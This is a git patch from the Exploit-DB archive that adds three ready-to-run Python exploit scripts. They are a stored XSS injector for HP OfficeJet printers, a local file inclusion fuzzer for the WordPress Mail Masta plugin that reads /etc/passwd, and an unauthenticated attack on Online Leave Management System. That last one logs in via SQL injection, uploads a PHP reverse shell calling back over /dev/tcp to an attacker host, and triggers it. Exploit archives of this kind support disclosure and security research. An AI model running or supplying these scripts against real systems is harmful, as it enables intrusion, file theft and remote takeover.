From 0388680649021cadeb0c0faf59f01cc2f658ec94 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Thu, 26 Aug 2021 05:02:00 +0000
Subject: [PATCH] DB: 2021-08-26

3 changes to exploits/shellcodes

WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)
Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)
---
 exploits/hardware/webapps/50227.py | 58 +++++++++++++++++++++
 exploits/php/webapps/50226.py      | 77 ++++++++++++++++++++++++++++
 exploits/php/webapps/50228.py      | 81 ++++++++++++++++++++++++++++++
 files_exploits.csv                 |  3 ++
 4 files changed, 219 insertions(+)
 create mode 100755 exploits/hardware/webapps/50227.py
 create mode 100755 exploits/php/webapps/50226.py
 create mode 100755 exploits/php/webapps/50228.py
diff --git a/exploits/hardware/webapps/50227.py b/exploits/hardware/webapps/50227.py
new file mode 100755
index 000000000..c19a50aa5
--- /dev/null
+++ b/exploits/hardware/webapps/50227.py
@@ -0,0 +1,58 @@
+# Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS)
+# Date: 01/08/2021
+# Exploit Author: Tyler Butler
+# Vendor Homepage: https://www8.hp.com/
+# Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742
+# Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630
+# Version: HP OfficeJet 7110 Wide Format ePrinter
+# Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A
+
+# PoC:
+import requests
+import json
+from requests.exceptions import HTTPError
+
+target = 'http://192.168.223.1'   # The IP of the vulnerable taget 
+payload = '''<script>alert('XSS');</script>'''  # The XSS injection payload you want to use 
+path='/DevMgmt/ProductConfigDyn.xml'   # Path location of the PUT command
+pre = '''
+<?xml version="1.0" encoding="UTF-8"?>
+<!-- THIS DATA SUBJECT TO DISCLAIMER(S) INCLUDED WITH THE PRODUCT OF ORIGIN. -->
+<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd">
+	<prdcfgdyn2:ProductSettings>
+		<prdcfgdyn:DeviceInformation>
+			<dd:DeviceLocation>
+'''  # The start of the request body
+post = '''
+            </dd:DeviceLocation>
+		</prdcfgdyn:DeviceInformation>
+	</prdcfgdyn2:ProductSettings>	
+</prdcfgdyn2:ProductConfigDyn>
+'''   # The end of the request body 
+body = pre + payload + post
+
+
+headers = {
+            'Host':'192.168.223.1', 
+            'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',
+            'Accept':'*/*',
+            'Accept-Language':'en-US,en;q=0.5',
+            'Accept-Encoding':'gzip, deflate',
+            'Content-Type':'text/xml',
+            'Content-Length':str(len(body.encode('utf-8'))),
+            'Origin':'https://192.168.223.1',
+            'Connection':'close',
+            'Referer':target,
+        }
+
+print('{!} Starting HP Officejet 4630 XSS Injector .... \n    Author: Tyler Butler\n    @tbutler0x90')
+try:
+    print('{!} Injecting payload :',payload)
+    response = requests.put(target+path, headers = headers, data = body)
+    response.raise_for_status()
+except HTTPError as http_err:
+    print('{X}',f'HTTP error occurred: {http_err}') 
+except Exception as err:
+    print('{X}',f'Other error occurred: {err}')
+else:
+    print('{!} Success!')
\ No newline at end of file
diff --git a/exploits/php/webapps/50226.py b/exploits/php/webapps/50226.py
new file mode 100755
index 000000000..a1fc13497
--- /dev/null
+++ b/exploits/php/webapps/50226.py
@@ -0,0 +1,77 @@
+# Exploit Title: WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
+# Date: 2021-08-24
+# Exploit Author: Matheus Alexandre [Xcatolin]
+# Software Link: https://downloads.wordpress.org/plugin/mail-masta.zip
+# Version: 1.0
+
+WordPress Plugin Mail Masta is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.
+
+* Make sure to modify the wordlist path to your preferred wordlist. You can also download the one i used at Github: 
+https://github.com/Xcatolin/Personal-Exploits/
+
+#!/usr/bin/python
+
+# Exploit for the Wordpress plugin mail-masta 1.0 LFI vulnerability
+
+import requests
+from requests.exceptions import ConnectionError
+
+class bcolors:
+    OKGREEN = '\033[92m'
+    WARNING = '\033[93m'
+    FAIL = '\033[91m'
+    ENDC = '\033[0m'
+    BOLD = '\033[1m'
+    ITALIC   = '\33[3m'
+
+print(bcolors.BOLD + """\
+                 __  __      _ _     __  __         _                  
+                |  \/  |__ _(_) |___|  \/  |__ _ __| |_ __ _           
+                | |\/| / _` | | |___| |\/| / _` (_-<  _/ _` |          
+                |_|  |_\__,_|_|_|   |_|  |_\__,_/__/\__\__,_|          
+  _                 _   ___ _ _       ___         _         _          
+ | |   ___  __ __ _| | | __(_) |___  |_ _|_ _  __| |_  _ __(_)___ _ _  
+ | |__/ _ \/ _/ _` | | | _|| | / -_)  | || ' \/ _| | || (_-< / _ \ ' \ 
+ |____\___/\__\__,_|_| |_| |_|_\___| |___|_||_\__|_|\_,_/__/_\___/_||_|
+
+			                           
+					|_   .  \_/ _ _ |_ _ |. _  
+					|_)\/.  / \(_(_||_(_)||| ) 
+					   /                       
+     """ + bcolors.ENDC)
+
+endpoint = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl="
+valid = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
+
+
+print (bcolors.WARNING + "[+] Insert the target including the WordPress instance:" + bcolors.ENDC)
+print (bcolors.ITALIC + "ex: http://target.com/wordpress\n" + bcolors.ENDC)
+target = raw_input("~# ")
+
+print (bcolors.WARNING + "[*] Checking if the target is alive..." + bcolors.ENDC)
+try:
+	request = requests.get(target)
+except ConnectionError:
+	print (bcolors.FAIL + "[X] Target not available. Please check the URL you've entered." + bcolors.ENDC)
+	exit(1)
+else:
+	print (bcolors.OKGREEN + "[!] Target up and running!\n" + bcolors.ENDC)
+
+print (bcolors.WARNING + "[*] Checking if the Mail-Masta endpoint is vulnerable..." + bcolors.ENDC)
+try:
+	response = requests.get(target + valid)
+except len(response.content) < 1000 :
+	print (bcolors.FAIL + "[X] Endpoint not vulnerable." + bcolors.ENDC)
+	exit(1)
+else:
+	print (bcolors.OKGREEN + "[!] Endpoint vulnerable!\n" + bcolors.ENDC)
+
+print (bcolors.WARNING + "[*] Fuzzing for files in the system..." + bcolors.ENDC)
+wordlist='wordlist.txt' ## Change here
+lines=open(wordlist, "r").readlines()
+
+for i in range(0, len(lines)):
+	word=lines[i].replace("\n","")
+	response = requests.get(target + endpoint + word)
+	if len(response.content) > 500 :
+		print (bcolors.OKGREEN + "[!] " + bcolors.ENDC) + "File",word,"found!"
\ No newline at end of file
diff --git a/exploits/php/webapps/50228.py b/exploits/php/webapps/50228.py
new file mode 100755
index 000000000..7511c45da
--- /dev/null
+++ b/exploits/php/webapps/50228.py
@@ -0,0 +1,81 @@
+# Exploit Title: Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)
+# Date: 24-08-2021
+# Exploit Author: Justin White
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html
+# Version: V1
+# Category: Webapps
+# Tested on: Linux
+
+
+#!/bin/env python3
+import requests
+import time
+import sys
+from colorama import Fore, Style
+
+if len(sys.argv) != 4:
+    print('python3 script.py <target url> <attacker ip> <attacker port>')
+    print('Example: python3 script.py http://127.0.0.1/ 10.0.0.1 4444')
+    exit()
+
+else:
+    try:
+        url = sys.argv[1]
+        attacker_ip = sys.argv[2]
+        attacker_port = sys.argv[3]
+        print()
+        print('[*] Trying to login...')
+        time.sleep(1)
+        login = url + '/classes/Login.php?f=login'
+        payload_name = "reverse_shell.php"
+        payload_file = r"""<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/\"{}\"/{} 0>&1'");?>""".format(attacker_ip, attacker_port)
+        session = requests.session()
+        post_data = {"username": "'' OR 1=1-- -'", "password": "'' OR 1=1-- -'"}
+        user_login = session.post(login, data=post_data)
+        cookie = session.cookies.get_dict()
+
+        if user_login.text == '{"status":"success"}':
+            print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')
+            upload_url = url + "/classes/Users.php?f=save"
+            cookies = cookie
+            headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"}
+            data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"
+            print('[*] Trying to Upload Reverse Shell...')
+            time.sleep(2)
+
+            try:
+                print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Reverse Shell Uploaded!')
+                upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)
+                upload_check = f'{url}/uploads'
+                r = requests.get(upload_check)
+                if payload_name in r.text:
+                    
+                    payloads = r.text.split('<a href="')
+                    for load in payloads:
+
+                        if payload_name in load:
+                            payload = load.split('"')
+                            payload = payload[0]
+                        else:
+                            pass
+                else:
+                    exit()
+
+            except:
+                print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Upload failed try again in a little bit!!!!!!\n')
+                exit()
+
+            try:
+                print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Check Your Listener!\n')
+                connect_url = url + '/uploads/'
+                r = requests.get(connect_url + payload)
+
+            except:
+                print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + f' Failed to find reverse shell check {connect_url} or try again!\n')
+                
+        else:
+            print('[' + Fore.RED + '-' + Style.RESET_ALL + ']' + ' Login failed!\n')
+
+    except:
+        print('[' + Fore.YELLOW + '!' + Style.RESET_ALL + ']' + ' Something Went Wrong!\n')
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6ef3cd286..9c3779b7c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44350,3 +44350,6 @@ id,file,description,date,author,type,platform,port
 50221,exploits/php/webapps/50221.py,"Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-23,"Halit AKAYDIN",webapps,php,
 50223,exploits/php/webapps/50223.txt,"Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)",2021-08-23,"Justin White",webapps,php,
 50224,exploits/php/webapps/50224.py,"RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)",2021-08-23,"Moritz Gruber",webapps,php,
+50226,exploits/php/webapps/50226.py,"WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)",2021-08-25,"Matheus Alexandre",webapps,php,
+50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",2021-08-25,"Tyler Butler",webapps,hardware,
+50228,exploits/php/webapps/50228.py,"Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)",2021-08-25,"Justin White",webapps,php,
